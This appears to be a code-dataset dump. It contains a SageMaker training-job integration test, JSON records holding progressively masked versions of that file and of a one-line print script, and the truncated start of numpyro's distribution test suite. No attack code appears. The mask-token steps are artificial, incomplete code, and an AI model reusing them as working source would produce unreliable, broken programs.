4
] |
# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may
# not use this file except in compliance with the License. A copy of the
# License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Integration tests for the SageMaker TrainingJob API.
"""
import pytest
import logging
from acktest.resources import random_suffix_name
from acktest.k8s import resource as k8s
from e2e import (
service_marker,
create_sagemaker_resource,
wait_for_status,
get_sagemaker_training_job,
assert_training_status_in_sync,
assert_tags_in_sync,
)
from e2e.replacement_values import REPLACEMENT_VALUES
from e2e.common import config as cfg
RESOURCE_PLURAL = "trainingjobs"
@pytest.fixture(scope="function")
def xgboost_training_job_debugger():
resource_name = random_suffix_name("xgboost-trainingjob-debugger", 50)
replacements = REPLACEMENT_VALUES.copy()
replacements["TRAINING_JOB_NAME"] = resource_name
reference, _, resource = create_sagemaker_resource(
resource_plural=RESOURCE_PLURAL,
resource_name=resource_name,
spec_file="xgboost_trainingjob_debugger",
replacements=replacements,
)
assert resource is not None
yield (reference, resource)
if k8s.get_resource_exists(reference):
_, deleted = k8s.delete_custom_resource(reference, 3, 10)
assert deleted
def get_training_rule_eval_sagemaker_status(training_job_name: str, rule_type: str):
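    # rule_type is "DebugRule" or "ProfilerRule"; the describe-training-job response exposes the
    # matching "<rule_type>EvaluationStatuses" list, and we read the first rule's evaluation status.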
training_sm_desc = get_sagemaker_training_job(training_job_name)
return training_sm_desc[rule_type+"EvaluationStatuses"][0]["RuleEvaluationStatus"]
def get_training_rule_eval_resource_status(reference: k8s.CustomResourceReference, rule_type: str):
resource = k8s.get_resource(reference)
resource_status = resource["status"][rule_type+"EvaluationStatuses"][0][
"ruleEvaluationStatus"
]
assert resource_status is not None
return resource_status
@service_marker
class TestTrainingDebuggerJob:
def _wait_sagemaker_training_rule_eval_status(
self,
training_job_name,
rule_type: str,
expected_status: str,
wait_periods: int = 30,
period_length: int = 30,
):
return wait_for_status(
expected_status,
wait_periods,
period_length,
get_training_rule_eval_sagemaker_status,
training_job_name,
rule_type,
)
def _wait_resource_training_rule_eval_status(
self,
reference: k8s.CustomResourceReference,
rule_type: str,
expected_status: str,
wait_periods: int = 30,
period_length: int = 30,
):
return wait_for_status(
expected_status,
wait_periods,
period_length,
get_training_rule_eval_resource_status,
reference,
rule_type,
)
def _assert_training_rule_eval_status_in_sync(
self, training_job_name, sagemaker_rule_type, reference, expected_status
):
resource_rule_type = sagemaker_rule_type[0].lower() + sagemaker_rule_type[1:]
assert (
self._wait_sagemaker_training_rule_eval_status(
training_job_name, sagemaker_rule_type, expected_status,
)
== self._wait_resource_training_rule_eval_status(reference, resource_rule_type, expected_status)
== expected_status
)
def test_completed(self, xgboost_training_job_debugger):
(reference, resource) = xgboost_training_job_debugger
assert k8s.get_resource_exists(reference)
training_job_name = resource["spec"].get("trainingJobName", None)
assert training_job_name is not None
training_job_desc = get_sagemaker_training_job(training_job_name)
training_job_arn = training_job_desc["TrainingJobArn"]
resource_arn = k8s.get_resource_arn(resource)
if resource_arn is None:
logging.error(
f"ARN for this resource is None, resource status is: {resource['status']}"
)
assert resource_arn == training_job_arn
assert training_job_desc["TrainingJobStatus"] == cfg.JOB_STATUS_INPROGRESS
assert k8s.wait_on_condition(reference, "ACK.ResourceSynced", "False")
assert_training_status_in_sync(
training_job_name, reference, cfg.JOB_STATUS_COMPLETED
)
assert k8s.wait_on_condition(reference, "ACK.ResourceSynced", "False")
# Assert debugger rule evaluation completed
self._assert_training_rule_eval_status_in_sync(
training_job_name, "DebugRule", reference, cfg.RULE_STATUS_COMPLETED
)
# Assert profiler rule evaluation completed
self._assert_training_rule_eval_status_in_sync(
training_job_name, "ProfilerRule", reference, cfg.RULE_STATUS_COMPLETED
)
assert k8s.wait_on_condition(reference, "ACK.ResourceSynced", "True")
resource_tags = resource["spec"].get("tags", None)
assert_tags_in_sync(training_job_arn, resource_tags)
# Check that you can delete a completed resource from k8s
_, deleted = k8s.delete_custom_resource(reference, cfg.JOB_DELETE_WAIT_PERIODS, cfg.JOB_DELETE_WAIT_LENGTH)
assert deleted is True
|
normal
|
{
"blob_id": "6f107d0d0328c2445c0e1d0dd10e51227da58129",
"index": 3900,
"step-1": "<mask token>\n\n\n@service_marker\nclass TestTrainingDebuggerJob:\n\n def _wait_sagemaker_training_rule_eval_status(self, training_job_name,\n rule_type: str, expected_status: str, wait_periods: int=30,\n period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_sagemaker_status, training_job_name,\n rule_type)\n\n def _wait_resource_training_rule_eval_status(self, reference: k8s.\n CustomResourceReference, rule_type: str, expected_status: str,\n wait_periods: int=30, period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_resource_status, reference, rule_type)\n\n def _assert_training_rule_eval_status_in_sync(self, training_job_name,\n sagemaker_rule_type, reference, expected_status):\n resource_rule_type = sagemaker_rule_type[0].lower(\n ) + sagemaker_rule_type[1:]\n assert self._wait_sagemaker_training_rule_eval_status(training_job_name\n , sagemaker_rule_type, expected_status\n ) == self._wait_resource_training_rule_eval_status(reference,\n resource_rule_type, expected_status) == expected_status\n <mask token>\n",
"step-2": "<mask token>\n\n\[email protected](scope='function')\ndef xgboost_training_job_debugger():\n resource_name = random_suffix_name('xgboost-trainingjob-debugger', 50)\n replacements = REPLACEMENT_VALUES.copy()\n replacements['TRAINING_JOB_NAME'] = resource_name\n reference, _, resource = create_sagemaker_resource(resource_plural=\n RESOURCE_PLURAL, resource_name=resource_name, spec_file=\n 'xgboost_trainingjob_debugger', replacements=replacements)\n assert resource is not None\n yield reference, resource\n if k8s.get_resource_exists(reference):\n _, deleted = k8s.delete_custom_resource(reference, 3, 10)\n assert deleted\n\n\ndef get_training_rule_eval_sagemaker_status(training_job_name: str,\n rule_type: str):\n training_sm_desc = get_sagemaker_training_job(training_job_name)\n return training_sm_desc[rule_type + 'EvaluationStatuses'][0][\n 'RuleEvaluationStatus']\n\n\n<mask token>\n\n\n@service_marker\nclass TestTrainingDebuggerJob:\n\n def _wait_sagemaker_training_rule_eval_status(self, training_job_name,\n rule_type: str, expected_status: str, wait_periods: int=30,\n period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_sagemaker_status, training_job_name,\n rule_type)\n\n def _wait_resource_training_rule_eval_status(self, reference: k8s.\n CustomResourceReference, rule_type: str, expected_status: str,\n wait_periods: int=30, period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_resource_status, reference, rule_type)\n\n def _assert_training_rule_eval_status_in_sync(self, training_job_name,\n sagemaker_rule_type, reference, expected_status):\n resource_rule_type = sagemaker_rule_type[0].lower(\n ) + sagemaker_rule_type[1:]\n assert self._wait_sagemaker_training_rule_eval_status(training_job_name\n , sagemaker_rule_type, expected_status\n ) == self._wait_resource_training_rule_eval_status(reference,\n resource_rule_type, expected_status) == expected_status\n\n def test_completed(self, xgboost_training_job_debugger):\n reference, resource = xgboost_training_job_debugger\n assert k8s.get_resource_exists(reference)\n training_job_name = resource['spec'].get('trainingJobName', None)\n assert training_job_name is not None\n training_job_desc = get_sagemaker_training_job(training_job_name)\n training_job_arn = training_job_desc['TrainingJobArn']\n resource_arn = k8s.get_resource_arn(resource)\n if resource_arn is None:\n logging.error(\n f\"ARN for this resource is None, resource status is: {resource['status']}\"\n )\n assert resource_arn == training_job_arn\n assert training_job_desc['TrainingJobStatus'\n ] == cfg.JOB_STATUS_INPROGRESS\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'False')\n assert_training_status_in_sync(training_job_name, reference, cfg.\n JOB_STATUS_COMPLETED)\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'False')\n self._assert_training_rule_eval_status_in_sync(training_job_name,\n 'DebugRule', reference, cfg.RULE_STATUS_COMPLETED)\n self._assert_training_rule_eval_status_in_sync(training_job_name,\n 'ProfilerRule', reference, cfg.RULE_STATUS_COMPLETED)\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'True')\n resource_tags = resource['spec'].get('tags', None)\n assert_tags_in_sync(training_job_arn, resource_tags)\n _, deleted = k8s.delete_custom_resource(reference, cfg.\n JOB_DELETE_WAIT_PERIODS, cfg.JOB_DELETE_WAIT_LENGTH)\n assert deleted is True\n",
"step-3": "<mask token>\n\n\[email protected](scope='function')\ndef xgboost_training_job_debugger():\n resource_name = random_suffix_name('xgboost-trainingjob-debugger', 50)\n replacements = REPLACEMENT_VALUES.copy()\n replacements['TRAINING_JOB_NAME'] = resource_name\n reference, _, resource = create_sagemaker_resource(resource_plural=\n RESOURCE_PLURAL, resource_name=resource_name, spec_file=\n 'xgboost_trainingjob_debugger', replacements=replacements)\n assert resource is not None\n yield reference, resource\n if k8s.get_resource_exists(reference):\n _, deleted = k8s.delete_custom_resource(reference, 3, 10)\n assert deleted\n\n\ndef get_training_rule_eval_sagemaker_status(training_job_name: str,\n rule_type: str):\n training_sm_desc = get_sagemaker_training_job(training_job_name)\n return training_sm_desc[rule_type + 'EvaluationStatuses'][0][\n 'RuleEvaluationStatus']\n\n\ndef get_training_rule_eval_resource_status(reference: k8s.\n CustomResourceReference, rule_type: str):\n resource = k8s.get_resource(reference)\n resource_status = resource['status'][rule_type + 'EvaluationStatuses'][0][\n 'ruleEvaluationStatus']\n assert resource_status is not None\n return resource_status\n\n\n@service_marker\nclass TestTrainingDebuggerJob:\n\n def _wait_sagemaker_training_rule_eval_status(self, training_job_name,\n rule_type: str, expected_status: str, wait_periods: int=30,\n period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_sagemaker_status, training_job_name,\n rule_type)\n\n def _wait_resource_training_rule_eval_status(self, reference: k8s.\n CustomResourceReference, rule_type: str, expected_status: str,\n wait_periods: int=30, period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_resource_status, reference, rule_type)\n\n def _assert_training_rule_eval_status_in_sync(self, training_job_name,\n sagemaker_rule_type, reference, expected_status):\n resource_rule_type = sagemaker_rule_type[0].lower(\n ) + sagemaker_rule_type[1:]\n assert self._wait_sagemaker_training_rule_eval_status(training_job_name\n , sagemaker_rule_type, expected_status\n ) == self._wait_resource_training_rule_eval_status(reference,\n resource_rule_type, expected_status) == expected_status\n\n def test_completed(self, xgboost_training_job_debugger):\n reference, resource = xgboost_training_job_debugger\n assert k8s.get_resource_exists(reference)\n training_job_name = resource['spec'].get('trainingJobName', None)\n assert training_job_name is not None\n training_job_desc = get_sagemaker_training_job(training_job_name)\n training_job_arn = training_job_desc['TrainingJobArn']\n resource_arn = k8s.get_resource_arn(resource)\n if resource_arn is None:\n logging.error(\n f\"ARN for this resource is None, resource status is: {resource['status']}\"\n )\n assert resource_arn == training_job_arn\n assert training_job_desc['TrainingJobStatus'\n ] == cfg.JOB_STATUS_INPROGRESS\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'False')\n assert_training_status_in_sync(training_job_name, reference, cfg.\n JOB_STATUS_COMPLETED)\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'False')\n self._assert_training_rule_eval_status_in_sync(training_job_name,\n 'DebugRule', reference, cfg.RULE_STATUS_COMPLETED)\n self._assert_training_rule_eval_status_in_sync(training_job_name,\n 'ProfilerRule', reference, cfg.RULE_STATUS_COMPLETED)\n assert k8s.wait_on_condition(reference, 
'ACK.ResourceSynced', 'True')\n resource_tags = resource['spec'].get('tags', None)\n assert_tags_in_sync(training_job_arn, resource_tags)\n _, deleted = k8s.delete_custom_resource(reference, cfg.\n JOB_DELETE_WAIT_PERIODS, cfg.JOB_DELETE_WAIT_LENGTH)\n assert deleted is True\n",
"step-4": "<mask token>\nRESOURCE_PLURAL = 'trainingjobs'\n\n\[email protected](scope='function')\ndef xgboost_training_job_debugger():\n resource_name = random_suffix_name('xgboost-trainingjob-debugger', 50)\n replacements = REPLACEMENT_VALUES.copy()\n replacements['TRAINING_JOB_NAME'] = resource_name\n reference, _, resource = create_sagemaker_resource(resource_plural=\n RESOURCE_PLURAL, resource_name=resource_name, spec_file=\n 'xgboost_trainingjob_debugger', replacements=replacements)\n assert resource is not None\n yield reference, resource\n if k8s.get_resource_exists(reference):\n _, deleted = k8s.delete_custom_resource(reference, 3, 10)\n assert deleted\n\n\ndef get_training_rule_eval_sagemaker_status(training_job_name: str,\n rule_type: str):\n training_sm_desc = get_sagemaker_training_job(training_job_name)\n return training_sm_desc[rule_type + 'EvaluationStatuses'][0][\n 'RuleEvaluationStatus']\n\n\ndef get_training_rule_eval_resource_status(reference: k8s.\n CustomResourceReference, rule_type: str):\n resource = k8s.get_resource(reference)\n resource_status = resource['status'][rule_type + 'EvaluationStatuses'][0][\n 'ruleEvaluationStatus']\n assert resource_status is not None\n return resource_status\n\n\n@service_marker\nclass TestTrainingDebuggerJob:\n\n def _wait_sagemaker_training_rule_eval_status(self, training_job_name,\n rule_type: str, expected_status: str, wait_periods: int=30,\n period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_sagemaker_status, training_job_name,\n rule_type)\n\n def _wait_resource_training_rule_eval_status(self, reference: k8s.\n CustomResourceReference, rule_type: str, expected_status: str,\n wait_periods: int=30, period_length: int=30):\n return wait_for_status(expected_status, wait_periods, period_length,\n get_training_rule_eval_resource_status, reference, rule_type)\n\n def _assert_training_rule_eval_status_in_sync(self, training_job_name,\n sagemaker_rule_type, reference, expected_status):\n resource_rule_type = sagemaker_rule_type[0].lower(\n ) + sagemaker_rule_type[1:]\n assert self._wait_sagemaker_training_rule_eval_status(training_job_name\n , sagemaker_rule_type, expected_status\n ) == self._wait_resource_training_rule_eval_status(reference,\n resource_rule_type, expected_status) == expected_status\n\n def test_completed(self, xgboost_training_job_debugger):\n reference, resource = xgboost_training_job_debugger\n assert k8s.get_resource_exists(reference)\n training_job_name = resource['spec'].get('trainingJobName', None)\n assert training_job_name is not None\n training_job_desc = get_sagemaker_training_job(training_job_name)\n training_job_arn = training_job_desc['TrainingJobArn']\n resource_arn = k8s.get_resource_arn(resource)\n if resource_arn is None:\n logging.error(\n f\"ARN for this resource is None, resource status is: {resource['status']}\"\n )\n assert resource_arn == training_job_arn\n assert training_job_desc['TrainingJobStatus'\n ] == cfg.JOB_STATUS_INPROGRESS\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'False')\n assert_training_status_in_sync(training_job_name, reference, cfg.\n JOB_STATUS_COMPLETED)\n assert k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'False')\n self._assert_training_rule_eval_status_in_sync(training_job_name,\n 'DebugRule', reference, cfg.RULE_STATUS_COMPLETED)\n self._assert_training_rule_eval_status_in_sync(training_job_name,\n 'ProfilerRule', reference, cfg.RULE_STATUS_COMPLETED)\n assert 
k8s.wait_on_condition(reference, 'ACK.ResourceSynced', 'True')\n resource_tags = resource['spec'].get('tags', None)\n assert_tags_in_sync(training_job_arn, resource_tags)\n _, deleted = k8s.delete_custom_resource(reference, cfg.\n JOB_DELETE_WAIT_PERIODS, cfg.JOB_DELETE_WAIT_LENGTH)\n assert deleted is True\n",
"step-5": "# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"). You may\n# not use this file except in compliance with the License. A copy of the\n# License is located at\n#\n# \t http://aws.amazon.com/apache2.0/\n#\n# or in the \"license\" file accompanying this file. This file is distributed\n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either\n# express or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\"\"\"Integration tests for the SageMaker TrainingJob API.\n\"\"\"\n\nimport pytest\nimport logging\n\nfrom acktest.resources import random_suffix_name\nfrom acktest.k8s import resource as k8s\nfrom e2e import (\n service_marker,\n create_sagemaker_resource,\n wait_for_status,\n get_sagemaker_training_job,\n assert_training_status_in_sync,\n assert_tags_in_sync,\n)\nfrom e2e.replacement_values import REPLACEMENT_VALUES\nfrom e2e.common import config as cfg\n\nRESOURCE_PLURAL = \"trainingjobs\"\n\n\[email protected](scope=\"function\")\ndef xgboost_training_job_debugger():\n resource_name = random_suffix_name(\"xgboost-trainingjob-debugger\", 50)\n replacements = REPLACEMENT_VALUES.copy()\n replacements[\"TRAINING_JOB_NAME\"] = resource_name\n reference, _, resource = create_sagemaker_resource(\n resource_plural=RESOURCE_PLURAL,\n resource_name=resource_name,\n spec_file=\"xgboost_trainingjob_debugger\",\n replacements=replacements,\n )\n assert resource is not None\n\n yield (reference, resource)\n\n if k8s.get_resource_exists(reference):\n _, deleted = k8s.delete_custom_resource(reference, 3, 10)\n assert deleted\n\n\ndef get_training_rule_eval_sagemaker_status(training_job_name: str, rule_type: str):\n training_sm_desc = get_sagemaker_training_job(training_job_name)\n return training_sm_desc[rule_type+\"EvaluationStatuses\"][0][\"RuleEvaluationStatus\"]\n\n\ndef get_training_rule_eval_resource_status(reference: k8s.CustomResourceReference, rule_type: str):\n resource = k8s.get_resource(reference)\n resource_status = resource[\"status\"][rule_type+\"EvaluationStatuses\"][0][\n \"ruleEvaluationStatus\"\n ]\n assert resource_status is not None\n return resource_status\n\n@service_marker\nclass TestTrainingDebuggerJob:\n def _wait_sagemaker_training_rule_eval_status(\n self,\n training_job_name,\n rule_type: str,\n expected_status: str,\n wait_periods: int = 30,\n period_length: int = 30,\n ):\n return wait_for_status(\n expected_status,\n wait_periods,\n period_length,\n get_training_rule_eval_sagemaker_status,\n training_job_name,\n rule_type,\n )\n\n def _wait_resource_training_rule_eval_status(\n self,\n reference: k8s.CustomResourceReference,\n rule_type: str,\n expected_status: str,\n wait_periods: int = 30,\n period_length: int = 30,\n ):\n return wait_for_status(\n expected_status,\n wait_periods,\n period_length,\n get_training_rule_eval_resource_status,\n reference,\n rule_type,\n )\n\n def _assert_training_rule_eval_status_in_sync(\n self, training_job_name, sagemaker_rule_type, reference, expected_status\n ):\n resource_rule_type = sagemaker_rule_type[0].lower() + sagemaker_rule_type[1:]\n assert (\n self._wait_sagemaker_training_rule_eval_status(\n training_job_name, sagemaker_rule_type, expected_status, \n )\n == self._wait_resource_training_rule_eval_status(reference, resource_rule_type, expected_status)\n == expected_status\n )\n\n def test_completed(self, xgboost_training_job_debugger):\n 
(reference, resource) = xgboost_training_job_debugger\n assert k8s.get_resource_exists(reference)\n\n training_job_name = resource[\"spec\"].get(\"trainingJobName\", None)\n assert training_job_name is not None\n\n training_job_desc = get_sagemaker_training_job(training_job_name)\n training_job_arn = training_job_desc[\"TrainingJobArn\"]\n \n resource_arn = k8s.get_resource_arn(resource)\n if resource_arn is None:\n logging.error(\n f\"ARN for this resource is None, resource status is: {resource['status']}\"\n )\n assert resource_arn == training_job_arn\n\n assert training_job_desc[\"TrainingJobStatus\"] == cfg.JOB_STATUS_INPROGRESS\n assert k8s.wait_on_condition(reference, \"ACK.ResourceSynced\", \"False\")\n\n assert_training_status_in_sync(\n training_job_name, reference, cfg.JOB_STATUS_COMPLETED\n )\n assert k8s.wait_on_condition(reference, \"ACK.ResourceSynced\", \"False\")\n\n # Assert debugger rule evaluation completed\n self._assert_training_rule_eval_status_in_sync(\n training_job_name, \"DebugRule\", reference, cfg.RULE_STATUS_COMPLETED\n )\n \n # Assert profiler rule evaluation completed\n self._assert_training_rule_eval_status_in_sync(\n training_job_name, \"ProfilerRule\", reference, cfg.RULE_STATUS_COMPLETED\n )\n assert k8s.wait_on_condition(reference, \"ACK.ResourceSynced\", \"True\")\n\n resource_tags = resource[\"spec\"].get(\"tags\", None)\n assert_tags_in_sync(training_job_arn, resource_tags)\n\n # Check that you can delete a completed resource from k8s\n _, deleted = k8s.delete_custom_resource(reference, cfg.JOB_DELETE_WAIT_PERIODS, cfg.JOB_DELETE_WAIT_LENGTH)\n assert deleted is True\n",
"step-ids": [
4,
7,
8,
9,
11
]
}
|
[
4,
7,
8,
9,
11
] |
print ("Hello Workls!")
|
normal
|
{
"blob_id": "c52d1c187edb17e85a8e2b47aa6731bc9a41ab1b",
"index": 561,
"step-1": "<mask token>\n",
"step-2": "print('Hello Workls!')\n",
"step-3": "print (\"Hello Workls!\")\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
# Copyright Contributors to the Pyro project.
# SPDX-License-Identifier: Apache-2.0
from collections import namedtuple
from functools import partial
import inspect
from itertools import product
import math
import os
import numpy as np
from numpy.testing import assert_allclose, assert_array_equal
import pytest
import scipy
from scipy.sparse import csr_matrix
import scipy.stats as osp
import jax
from jax import grad, lax, vmap
import jax.numpy as jnp
import jax.random as random
from jax.scipy.special import expit, logsumexp
from jax.scipy.stats import norm as jax_norm, truncnorm as jax_truncnorm
import numpyro.distributions as dist
from numpyro.distributions import (
SineBivariateVonMises,
constraints,
kl_divergence,
transforms,
)
from numpyro.distributions.batch_util import vmap_over
from numpyro.distributions.discrete import _to_probs_bernoulli, _to_probs_multinom
from numpyro.distributions.flows import InverseAutoregressiveTransform
from numpyro.distributions.gof import InvalidTest, auto_goodness_of_fit
from numpyro.distributions.transforms import (
LowerCholeskyAffine,
PermuteTransform,
PowerTransform,
SimplexToOrderedTransform,
SoftplusTransform,
biject_to,
)
from numpyro.distributions.util import (
matrix_to_tril_vec,
multinomial,
signed_stick_breaking_tril,
sum_rightmost,
vec_to_tril_matrix,
)
from numpyro.nn import AutoregressiveNN
TEST_FAILURE_RATE = 2e-5 # For all goodness-of-fit tests.
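# Helper utilities for the tests below.
# my_kron computes a batched Kronecker product over the trailing two axes:
# for A of shape (..., m, n) and B of shape (..., p, q) it returns an array
# of shape (..., m * p, n * q).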
def my_kron(A, B):
D = A[..., :, None, :, None] * B[..., None, :, None, :]
ds = D.shape
newshape = (*ds[:-4], ds[-4] * ds[-3], ds[-2] * ds[-1])
return D.reshape(newshape)
def _identity(x):
return x
def _circ_mean(angles):
return jnp.arctan2(
jnp.mean(jnp.sin(angles), axis=0), jnp.mean(jnp.cos(angles), axis=0)
)
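# Drift/diffusion functions for the EulerMaruyama test cases: each returns the
# drift term and a constant diffusion coefficient for the given state.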
def sde_fn1(x, _):
lam = 0.1
sigma2 = 0.1
return lam * x, sigma2
def sde_fn2(xy, _):
tau, a = 2.0, 1.1
x, y = xy[0], xy[1]
dx = tau * (x - x**3.0 / 3.0 + y)
dy = (1.0 / tau) * (a - x)
dxy = jnp.vstack([dx, dy]).reshape(xy.shape)
sigma2 = 0.1
return dxy, sigma2
class T(namedtuple("TestCase", ["jax_dist", "sp_dist", "params"])):
def __new__(cls, jax_dist, *params):
sp_dist = get_sp_dist(jax_dist)
return super(cls, T).__new__(cls, jax_dist, sp_dist, params)
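# Converters from numpyro distributions to the equivalent frozen scipy
# distributions; these back the _DIST_MAP lookup table defined below.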
def _mvn_to_scipy(loc, cov, prec, tril):
jax_dist = dist.MultivariateNormal(loc, cov, prec, tril)
mean = jax_dist.mean
cov = jax_dist.covariance_matrix
return osp.multivariate_normal(mean=mean, cov=cov)
def _multivariate_t_to_scipy(df, loc, tril):
    # compare version components numerically rather than lexicographically
    # (as strings, "1.10.0" < "1.6.0" would wrongly skip the test)
    if tuple(int(p) for p in scipy.__version__.split(".")[:2]) < (1, 6):
pytest.skip(
"Multivariate Student-T distribution is not available in scipy < 1.6"
)
jax_dist = dist.MultivariateStudentT(df, loc, tril)
mean = jax_dist.mean
cov = jax_dist.covariance_matrix
return osp.multivariate_t(loc=mean, shape=cov, df=df)
def _lowrank_mvn_to_scipy(loc, cov_fac, cov_diag):
jax_dist = dist.LowRankMultivariateNormal(loc, cov_fac, cov_diag)
mean = jax_dist.mean
cov = jax_dist.covariance_matrix
return osp.multivariate_normal(mean=mean, cov=cov)
def _truncnorm_to_scipy(loc, scale, low, high):
if low is None:
a = -np.inf
else:
a = (low - loc) / scale
if high is None:
b = np.inf
else:
b = (high - loc) / scale
return osp.truncnorm(a, b, loc=loc, scale=scale)
def _TruncatedNormal(loc, scale, low, high):
return dist.TruncatedNormal(loc=loc, scale=scale, low=low, high=high)
def _TruncatedCauchy(loc, scale, low, high):
return dist.TruncatedCauchy(loc=loc, scale=scale, low=low, high=high)
_TruncatedNormal.arg_constraints = {}
_TruncatedNormal.reparametrized_params = []
_TruncatedNormal.infer_shapes = lambda *args: (lax.broadcast_shapes(*args), ())
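# The wrapper classes below adapt existing numpyro distributions (fixing base
# distributions, exposing flat constructor arguments, or adding sampling) so
# they can appear in the test-case tables further down; the vmap_over
# registrations tell the vmapping tests how each constructor argument maps
# onto the wrapped distribution's parameters.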
class SineSkewedUniform(dist.SineSkewed):
def __init__(self, skewness, **kwargs):
lower, upper = (np.array([-math.pi, -math.pi]), np.array([math.pi, math.pi]))
base_dist = dist.Uniform(lower, upper, **kwargs).to_event(lower.ndim)
super().__init__(base_dist, skewness, **kwargs)
@vmap_over.register
def _vmap_over_sine_skewed_uniform(self: SineSkewedUniform, skewness=None):
return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None, skewness=skewness)
class SineSkewedVonMises(dist.SineSkewed):
def __init__(self, skewness, **kwargs):
von_loc, von_conc = (np.array([0.0]), np.array([1.0]))
base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc.ndim)
super().__init__(base_dist, skewness, **kwargs)
@vmap_over.register
def _vmap_over_sine_skewed_von_mises(self: SineSkewedVonMises, skewness=None):
return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None, skewness=skewness)
class SineSkewedVonMisesBatched(dist.SineSkewed):
def __init__(self, skewness, **kwargs):
von_loc, von_conc = (np.array([0.0, -1.234]), np.array([1.0, 10.0]))
base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc.ndim)
super().__init__(base_dist, skewness, **kwargs)
@vmap_over.register
def _vmap_over_sine_skewed_von_mises_batched(
self: SineSkewedVonMisesBatched, skewness=None
):
return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None, skewness=skewness)
class _GaussianMixture(dist.MixtureSameFamily):
arg_constraints = {}
reparametrized_params = []
def __init__(self, mixing_probs, loc, scale):
component_dist = dist.Normal(loc=loc, scale=scale)
mixing_distribution = dist.Categorical(probs=mixing_probs)
super().__init__(
mixing_distribution=mixing_distribution,
component_distribution=component_dist,
)
@property
def loc(self):
return self.component_distribution.loc
@property
def scale(self):
return self.component_distribution.scale
@vmap_over.register
def _vmap_over_gaussian_mixture(self: _GaussianMixture, loc=None, scale=None):
component_distribution = vmap_over(
self.component_distribution, loc=loc, scale=scale
)
return vmap_over.dispatch(dist.MixtureSameFamily)(
self, _component_distribution=component_distribution
)
class _Gaussian2DMixture(dist.MixtureSameFamily):
arg_constraints = {}
reparametrized_params = []
def __init__(self, mixing_probs, loc, covariance_matrix):
component_dist = dist.MultivariateNormal(
loc=loc, covariance_matrix=covariance_matrix
)
mixing_distribution = dist.Categorical(probs=mixing_probs)
super().__init__(
mixing_distribution=mixing_distribution,
component_distribution=component_dist,
)
@property
def loc(self):
return self.component_distribution.loc
@property
def covariance_matrix(self):
return self.component_distribution.covariance_matrix
@vmap_over.register
def _vmap_over_gaussian_2d_mixture(self: _Gaussian2DMixture, loc=None):
component_distribution = vmap_over(self.component_distribution, loc=loc)
return vmap_over.dispatch(dist.MixtureSameFamily)(
self, _component_distribution=component_distribution
)
class _GeneralMixture(dist.MixtureGeneral):
arg_constraints = {}
reparametrized_params = []
def __init__(self, mixing_probs, locs, scales):
component_dists = [
dist.Normal(loc=loc_, scale=scale_) for loc_, scale_ in zip(locs, scales)
]
mixing_distribution = dist.Categorical(probs=mixing_probs)
return super().__init__(
mixing_distribution=mixing_distribution,
component_distributions=component_dists,
)
@property
def locs(self):
# hotfix for vmapping tests, which cannot easily check non-array attributes
return self.component_distributions[0].loc
@property
def scales(self):
return self.component_distributions[0].scale
@vmap_over.register
def _vmap_over_general_mixture(self: _GeneralMixture, locs=None, scales=None):
component_distributions = [
vmap_over(d, loc=locs, scale=scales) for d in self.component_distributions
]
return vmap_over.dispatch(dist.MixtureGeneral)(
self, _component_distributions=component_distributions
)
class _General2DMixture(dist.MixtureGeneral):
arg_constraints = {}
reparametrized_params = []
def __init__(self, mixing_probs, locs, covariance_matrices):
component_dists = [
dist.MultivariateNormal(loc=loc_, covariance_matrix=covariance_matrix)
for loc_, covariance_matrix in zip(locs, covariance_matrices)
]
mixing_distribution = dist.Categorical(probs=mixing_probs)
return super().__init__(
mixing_distribution=mixing_distribution,
component_distributions=component_dists,
)
@property
def locs(self):
# hotfix for vmapping tests, which cannot easily check non-array attributes
return self.component_distributions[0].loc
@property
def covariance_matrices(self):
return self.component_distributions[0].covariance_matrix
@vmap_over.register
def _vmap_over_general_2d_mixture(self: _General2DMixture, locs=None):
component_distributions = [
vmap_over(d, loc=locs) for d in self.component_distributions
]
return vmap_over.dispatch(dist.MixtureGeneral)(
self, _component_distributions=component_distributions
)
class _ImproperWrapper(dist.ImproperUniform):
def sample(self, key, sample_shape=()):
transform = biject_to(self.support)
prototype_value = jnp.zeros(self.event_shape)
unconstrained_event_shape = jnp.shape(transform.inv(prototype_value))
shape = sample_shape + self.batch_shape + unconstrained_event_shape
unconstrained_samples = random.uniform(key, shape, minval=-2, maxval=2)
return transform(unconstrained_samples)
class ZeroInflatedPoissonLogits(dist.discrete.ZeroInflatedLogits):
arg_constraints = {"rate": constraints.positive, "gate_logits": constraints.real}
pytree_data_fields = ("rate",)
def __init__(self, rate, gate_logits, *, validate_args=None):
self.rate = rate
